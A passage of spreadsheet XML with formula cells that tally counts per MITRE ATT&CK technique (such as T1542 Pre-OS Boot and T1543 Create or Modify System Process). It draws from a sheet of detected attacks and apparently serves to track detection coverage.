      <c r="U53" s="4" t="str">
        <f t="shared" si="2"/>
        <v>25 (25)</v>
      </c>
      <c r="V53" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="W53" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>8</v>
      </c>
      <c r="Y53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>33</v>
      </c>
      <c r="Z53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>33</v>
      </c>
      <c r="AA53" s="322" t="str">
        <f t="shared" si="3"/>
        <v>33 (33)</v>
      </c>
      <c r="AB53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="AC53" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>13</v>
      </c>
      <c r="AE53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>17</v>
      </c>
      <c r="AF53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>17</v>
      </c>
      <c r="AG53" s="322" t="str">
        <f t="shared" si="4"/>
        <v>17 (17)</v>
      </c>
      <c r="AH53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>5</v>
      </c>
      <c r="AI53" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>13</v>
      </c>
      <c r="AK53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>50</v>
      </c>
      <c r="AL53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>50</v>
      </c>
      <c r="AM53" s="322" t="str">
        <f t="shared" si="5"/>
        <v>50 (50)</v>
      </c>
      <c r="AN53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>11</v>
      </c>
      <c r="AO53" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>20</v>
      </c>
      <c r="AQ53" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR53" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS53" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT53" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU53" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>5</v>
      </c>
      <c r="AX53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>5</v>
      </c>
      <c r="AY53" s="322" t="str">
        <f t="shared" si="7"/>
        <v>5 (5)</v>
      </c>
      <c r="AZ53" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA53" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>5</v>
      </c>
      <c r="BC53" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>30</v>
      </c>
      <c r="BD53" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>30</v>
      </c>
      <c r="BE53" s="4" t="str">
        <f t="shared" si="8"/>
        <v>30 (30)</v>
      </c>
      <c r="BF53" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>5</v>
      </c>
      <c r="BG53" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>13</v>
      </c>
      <c r="BI53" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>8</v>
      </c>
      <c r="BJ53" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>8</v>
      </c>
      <c r="BK53" s="322" t="str">
        <f t="shared" si="9"/>
        <v>8 (8)</v>
      </c>
      <c r="BL53" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM53" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>8</v>
      </c>
      <c r="BO53" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>83</v>
      </c>
      <c r="BP53" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>83</v>
      </c>
      <c r="BQ53" s="4" t="str">
        <f t="shared" si="10"/>
        <v>83 (83)</v>
      </c>
      <c r="BR53" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS53" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>5</v>
      </c>
      <c r="BT53" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU53" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>75</v>
      </c>
      <c r="BV53" s="292">
        <v>6</v>
      </c>
      <c r="BW53" s="322">
        <v>6</v>
      </c>
      <c r="BX53" s="4" t="str">
        <f t="shared" si="11"/>
        <v>6 (6)</v>
      </c>
      <c r="BY53" s="12">
        <v>1</v>
      </c>
      <c r="BZ53" s="13">
        <v>1</v>
      </c>
      <c r="CA53" s="394">
        <v>6</v>
      </c>
      <c r="CB53" s="288">
        <v>12</v>
      </c>
      <c r="CC53" s="4">
        <v>12</v>
      </c>
      <c r="CD53" s="4" t="str">
        <f t="shared" si="12"/>
        <v>12 (12)</v>
      </c>
      <c r="CE53" s="4">
        <v>1</v>
      </c>
      <c r="CF53" s="4">
        <v>1</v>
      </c>
      <c r="CG53" s="13">
        <v>1</v>
      </c>
      <c r="CH53" s="394">
        <v>6</v>
      </c>
    </row>
    <row r="54" spans="1:86" ht="15" customHeight="1">
      <c r="A54" s="4">
        <f t="shared" si="13"/>
        <v>52</v>
      </c>
      <c r="B54" s="4" t="str">
        <f>IFERROR(VLOOKUP(A54,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1542</v>
      </c>
      <c r="C54" s="493" t="str">
        <f>IFERROR(VLOOKUP(B54,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Pre-OS Boot</v>
      </c>
      <c r="D54" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B54)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E54" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>13</v>
      </c>
      <c r="F54" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (13)</v>
      </c>
      <c r="G54" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>14</v>
      </c>
      <c r="H54" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>3</v>
      </c>
      <c r="I54" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (14)</v>
      </c>
      <c r="J54" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K54" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M54" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>98</v>
      </c>
      <c r="N54" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>6</v>
      </c>
      <c r="O54" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (98)</v>
      </c>
      <c r="P54" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>5</v>
      </c>
      <c r="Q54" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>3</v>
      </c>
      <c r="S54" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>112</v>
      </c>
      <c r="T54" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>9</v>
      </c>
      <c r="U54" s="4" t="str">
        <f t="shared" si="2"/>
        <v>9 (112)</v>
      </c>
      <c r="V54" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>8</v>
      </c>
      <c r="W54" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>4</v>
      </c>
      <c r="Y54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>1699</v>
      </c>
      <c r="Z54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>21</v>
      </c>
      <c r="AA54" s="322" t="str">
        <f t="shared" si="3"/>
        <v>21 (1699)</v>
      </c>
      <c r="AB54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>8</v>
      </c>
      <c r="AC54" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>7</v>
      </c>
      <c r="AE54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>3410</v>
      </c>
      <c r="AF54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>20</v>
      </c>
      <c r="AG54" s="322" t="str">
        <f t="shared" si="4"/>
        <v>20 (3410)</v>
      </c>
      <c r="AH54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>12</v>
      </c>
      <c r="AI54" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>8</v>
      </c>
      <c r="AK54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>5109</v>
      </c>
      <c r="AL54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>41</v>
      </c>
      <c r="AM54" s="322" t="str">
        <f t="shared" si="5"/>
        <v>41 (5109)</v>
      </c>
      <c r="AN54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>31</v>
      </c>
      <c r="AO54" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>8</v>
      </c>
      <c r="AQ54" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR54" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS54" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT54" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU54" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>8</v>
      </c>
      <c r="AX54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>5</v>
      </c>
      <c r="AY54" s="322" t="str">
        <f t="shared" si="7"/>
        <v>5 (8)</v>
      </c>
      <c r="AZ54" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>4</v>
      </c>
      <c r="BA54" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>4</v>
      </c>
      <c r="BC54" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>120</v>
      </c>
      <c r="BD54" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>14</v>
      </c>
      <c r="BE54" s="4" t="str">
        <f t="shared" si="8"/>
        <v>14 (120)</v>
      </c>
      <c r="BF54" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>12</v>
      </c>
      <c r="BG54" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>4</v>
      </c>
      <c r="BI54" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>3</v>
      </c>
      <c r="BJ54" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>2</v>
      </c>
      <c r="BK54" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL54" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM54" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO54" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>8</v>
      </c>
      <c r="BP54" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>7</v>
      </c>
      <c r="BQ54" s="4" t="str">
        <f t="shared" si="10"/>
        <v>7 (8)</v>
      </c>
      <c r="BR54" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS54" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT54" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU54" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>5</v>
      </c>
      <c r="BV54" s="292">
        <v>2</v>
      </c>
      <c r="BW54" s="322">
        <v>2</v>
      </c>
      <c r="BX54" s="4" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY54" s="12">
        <v>1</v>
      </c>
      <c r="BZ54" s="13">
        <v>1</v>
      </c>
      <c r="CA54" s="394">
        <v>2</v>
      </c>
      <c r="CB54" s="288">
        <v>4</v>
      </c>
      <c r="CC54" s="4">
        <v>4</v>
      </c>
      <c r="CD54" s="4" t="str">
        <f t="shared" si="12"/>
        <v>4 (4)</v>
      </c>
      <c r="CE54" s="4">
        <v>1</v>
      </c>
      <c r="CF54" s="4">
        <v>1</v>
      </c>
      <c r="CG54" s="13">
        <v>1</v>
      </c>
      <c r="CH54" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="55" spans="1:86" ht="15" customHeight="1">
      <c r="A55" s="4">
        <f t="shared" si="13"/>
        <v>53</v>
      </c>
      <c r="B55" s="4" t="str">
        <f>IFERROR(VLOOKUP(A55,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1543</v>
      </c>
      <c r="C55" s="493" t="str">
        <f>IFERROR(VLOOKUP(B55,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Create or Modify System Process</v>
      </c>
      <c r="D55" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B55)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E55" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F55" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G55" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>16</v>
      </c>
      <c r="H55" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>6</v>
      </c>
      <c r="I55" s="322" t="str">
        <f t="shared" si="0"/>
        <v>6 (16)</v>
      </c>
      <c r="J55" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K55" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L55" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M55" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>8</v>
      </c>
      <c r="N55" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>6</v>
      </c>
      <c r="O55" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (8)</v>
      </c>
      <c r="P55" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>3</v>
      </c>
      <c r="Q55" s="13">
